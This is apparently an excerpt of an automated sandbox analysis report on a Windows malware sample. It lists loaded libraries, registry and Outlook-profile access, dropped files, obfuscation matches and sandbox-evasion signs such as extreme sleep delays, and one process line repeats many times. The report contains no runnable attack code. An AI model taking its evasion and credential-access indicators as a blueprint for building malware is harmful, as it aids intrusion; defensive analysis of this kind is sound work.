            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: timelanges.lnk.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa
            Source: timelanges.lnk0.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile written: C:\Users\user\spinsterishly\Aphthartodocetic.iniJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 4kobC6KGC3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.50858193838.0000000005BAE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_70471B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70471B5F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F9C30 push esp; retf 0762h2_2_075F9D55
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F8DDF push esp; iretd 2_2_075F8DE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F8C2F pushfd ; iretd 2_2_075F8C30
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_075F891E pushad ; iretd 2_2_075F891F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile created: C:\Users\user\AppData\Local\Temp\nsh4A12.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeAPI/Special instruction interceptor: Address: 63A0FDF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeAPI/Special instruction interceptor: Address: 4860FDF
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeMemory allocated: 75B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeMemory allocated: 37FF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeMemory allocated: 37D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4A12.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeAPI coverage: 2.1 %
            Source: C:\Users\user\Desktop\4kobC6KGC3.exe TID: 5840Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exe TID: 5840Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_004065C7 FindFirstFileW,FindClose,2_2_004065C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405996
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeThread delayed: delay time: 600000Jump to behavior
            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.0000000007960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPj
            Source: 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079D5000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
